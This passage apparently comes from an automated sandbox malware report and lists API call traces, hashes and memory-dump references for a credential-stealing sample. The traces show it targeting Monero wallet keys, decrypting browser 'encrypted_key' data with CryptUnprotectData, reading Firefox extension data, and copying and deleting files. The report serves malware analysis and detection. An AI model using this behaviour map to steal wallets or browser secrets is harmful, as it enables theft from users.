                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpymemset
                        • String ID: s_$s_$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 4047604823-1486079241
                        • Opcode ID: 115d6132cdfb6a42112e90ba81f489c1cfbb710b5131ef111e5c70a837ecb683
                        • Instruction ID: 6e5521aac1aa35612e068ce0776c9ab3f8945295411a08e30d1731995a88ec04
                        • Opcode Fuzzy Hash: 115d6132cdfb6a42112e90ba81f489c1cfbb710b5131ef111e5c70a837ecb683
                        • Instruction Fuzzy Hash: C6514FB0D0421D9BDB14EBA0DC89BFEBB74BF48304F5045A8E21967181EB786E88CF55
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F7E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F7E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0114C2B0,00000000,00020119,?), ref: 005F7E5E
                        • RegQueryValueExA.ADVAPI32(?,0115D940,00000000,00000000,000000FF,000000FF), ref: 005F7E7F
                        • RegCloseKey.ADVAPI32(?), ref: 005F7E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 69bb466a487a79c2c4870b73f2e0f6210884b0adebbb414764603f7ba7736aad
                        • Instruction ID: dd9728c95cbffb64de7fd453399418b58fe25d836d742395c66804da63aea235
                        • Opcode Fuzzy Hash: 69bb466a487a79c2c4870b73f2e0f6210884b0adebbb414764603f7ba7736aad
                        • Instruction Fuzzy Hash: FD114FB1A44209EBD718CF94DD49F7BBBBCFB08710F10855AF705A7280D77859018BA1
                        APIs
                        • StrStrA.SHLWAPI(0115DEB8,?,?,?,005F140C,?,0115DEB8,00000000), ref: 005F926C
                        • lstrcpyn.KERNEL32(0082AB88,0115DEB8,0115DEB8,?,005F140C,?,0115DEB8), ref: 005F9290
                        • lstrlen.KERNEL32(?,?,005F140C,?,0115DEB8), ref: 005F92A7
                        • wsprintfA.USER32 ref: 005F92C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: c3e8b98b2934b5bd65bf193c563edb3519214ac5aa3ff1c19e48c7d4b8485ab9
                        • Instruction ID: c730dab68db405743880799f99ff8f6a09ecd0401798b3d3df1d0eb2b49ee3fe
                        • Opcode Fuzzy Hash: c3e8b98b2934b5bd65bf193c563edb3519214ac5aa3ff1c19e48c7d4b8485ab9
                        • Instruction Fuzzy Hash: A701DA75500208FFCB18DFECD988EAE7BB9FF48364F108548F9099B244C635AA41DB95
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005E12B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005E12BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005E12D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005E12F5
                        • RegCloseKey.ADVAPI32(?), ref: 005E12FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: ebcbe25669c64512609e28f717ccf7e39e23797f6e48cff66fa99c4be0b8b25d
                        • Instruction ID: 17e727a9a2e5779b9944122cee01a2d9d28789de388efe4ca51a9f3e65bafbbd
                        • Opcode Fuzzy Hash: ebcbe25669c64512609e28f717ccf7e39e23797f6e48cff66fa99c4be0b8b25d
                        • Instruction Fuzzy Hash: F401CDB9A40208BFDB18DFE4DC49FAEB7B8FF48701F108159FA45A7280D6759A018B55
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 005F6663
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005F6726
                        • ExitProcess.KERNEL32 ref: 005F6755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 77a22c13279cbb0276d34141260c625b9917b3f5d88f26580be5c86f7cefd090
                        • Instruction ID: 2d69bd651249e11c727632216a2239230e5a868a773ce98175b236a664421969
                        • Opcode Fuzzy Hash: 77a22c13279cbb0276d34141260c625b9917b3f5d88f26580be5c86f7cefd090
                        • Instruction Fuzzy Hash: F3313CF1801209ABDB18EB90DD86BEE7B78BF44300F404198F31966191DFB86B49CF5A
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00600E28,00000000,?), ref: 005F882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F8836
                        • wsprintfA.USER32 ref: 005F8850
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 0478ad304783ccb518ee591c8bb207983d815358d321d06de766f6549e462e86
                        • Instruction ID: 9eeb180e55170229ec1d3c30b06129605db47d7a698d69b5fa863dea3a616fc7
                        • Opcode Fuzzy Hash: 0478ad304783ccb518ee591c8bb207983d815358d321d06de766f6549e462e86
                        • Instruction Fuzzy Hash: 6E2100B1A40208AFDB18DF94DD49FAEBBB8FF48711F108519F605A7280C779A9018BA5
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,005F951E,00000000), ref: 005F8D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F8D62
                        • wsprintfW.USER32 ref: 005F8D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 9aaefffa4c544db56080b4b91611861dd58c96c7c5ab1c2f33eab5010ed488e1
                        • Instruction ID: 3ffc80bc8c9082b5c7db2deb116af7c97f26eed9ac5abb4e60289f7492b0a417
                        • Opcode Fuzzy Hash: 9aaefffa4c544db56080b4b91611861dd58c96c7c5ab1c2f33eab5010ed488e1
                        • Instruction Fuzzy Hash: 7DE08CB0A40208BFDB28DB94DC0AE6977B8FF04702F0080A4FE0987280DA719E018B96
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005F8B60: GetSystemTime.KERNEL32(00600E1A,0115A8D0,006005AE,?,?,005E13F9,?,0000001A,00600E1A,00000000,?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005F8B86
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005EA2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 005EA3FF
                        • lstrlen.KERNEL32(00000000), ref: 005EA6BC
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 005EA743
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 521bd575bdec791c2266cb47e668f0b3f77779ba929c39907bec7a6e98bc5148
                        • Instruction ID: 0fd558d036bd9417283bf05e3ab3c407e1989c7067693a85ff4b1c03036b599c
                        • Opcode Fuzzy Hash: 521bd575bdec791c2266cb47e668f0b3f77779ba929c39907bec7a6e98bc5148
                        • Instruction Fuzzy Hash: 1DE112B281010D9BCB18EBA4DD99EFE7738BF54340F508169F61A72095EF746A09CB63
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005F8B60: GetSystemTime.KERNEL32(00600E1A,0115A8D0,006005AE,?,?,005E13F9,?,0000001A,00600E1A,00000000,?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005F8B86
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005ED481
                        • lstrlen.KERNEL32(00000000), ref: 005ED698
                        • lstrlen.KERNEL32(00000000), ref: 005ED6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 005ED72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 9a2cd45b7f92d5ae703b1f9d73b5430ecfc702da94bcd33dc4d36e30920d6675
                        • Instruction ID: cfa80996775a1f610cfe9d158e13e9ce00ab714329ffb84ce76f5ec2f37e587a
                        • Opcode Fuzzy Hash: 9a2cd45b7f92d5ae703b1f9d73b5430ecfc702da94bcd33dc4d36e30920d6675
                        • Instruction Fuzzy Hash: ED91F1B281010D9BDB18FBA0DD59DFE7738BF94340F508169F60A66095EF786A09CB63
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005F8B60: GetSystemTime.KERNEL32(00600E1A,0115A8D0,006005AE,?,?,005E13F9,?,0000001A,00600E1A,00000000,?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005F8B86
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005ED801
                        • lstrlen.KERNEL32(00000000), ref: 005ED99F
                        • lstrlen.KERNEL32(00000000), ref: 005ED9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 005EDA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005E99EC
                          • Part of subcall function 005E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005E9A11
                          • Part of subcall function 005E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005E9A31
                          • Part of subcall function 005E99C0: ReadFile.KERNEL32(000000FF,?,00000000,005E148F,00000000), ref: 005E9A5A
                          • Part of subcall function 005E99C0: LocalFree.KERNEL32(005E148F), ref: 005E9A90
                          • Part of subcall function 005E99C0: CloseHandle.KERNEL32(000000FF), ref: 005E9A9A
                          • Part of subcall function 005F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005F8E52
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00601580,00600D92), ref: 005EF54C
                        • lstrlen.KERNEL32(00000000), ref: 005EF56B
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005E99EC
                          • Part of subcall function 005E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005E9A11
                          • Part of subcall function 005E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005E9A31
                          • Part of subcall function 005E99C0: ReadFile.KERNEL32(000000FF,?,00000000,005E148F,00000000), ref: 005E9A5A
                          • Part of subcall function 005E99C0: LocalFree.KERNEL32(005E148F), ref: 005E9A90
                          • Part of subcall function 005E99C0: CloseHandle.KERNEL32(000000FF), ref: 005E9A9A
                          • Part of subcall function 005F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005F8E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005E9D39
                          • Part of subcall function 005E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N^,00000000,00000000), ref: 005E9AEF
                          • Part of subcall function 005E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,005E4EEE,00000000,?), ref: 005E9B01
                          • Part of subcall function 005E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N^,00000000,00000000), ref: 005E9B2A
                          • Part of subcall function 005E9AC0: LocalFree.KERNEL32(?,?,?,?,005E4EEE,00000000,?), ref: 005E9B3F
                          • Part of subcall function 005E9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005E9B84
                          • Part of subcall function 005E9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 005E9BA3
                          • Part of subcall function 005E9B60: LocalFree.KERNEL32(?), ref: 005E9BD3
                        Similarity
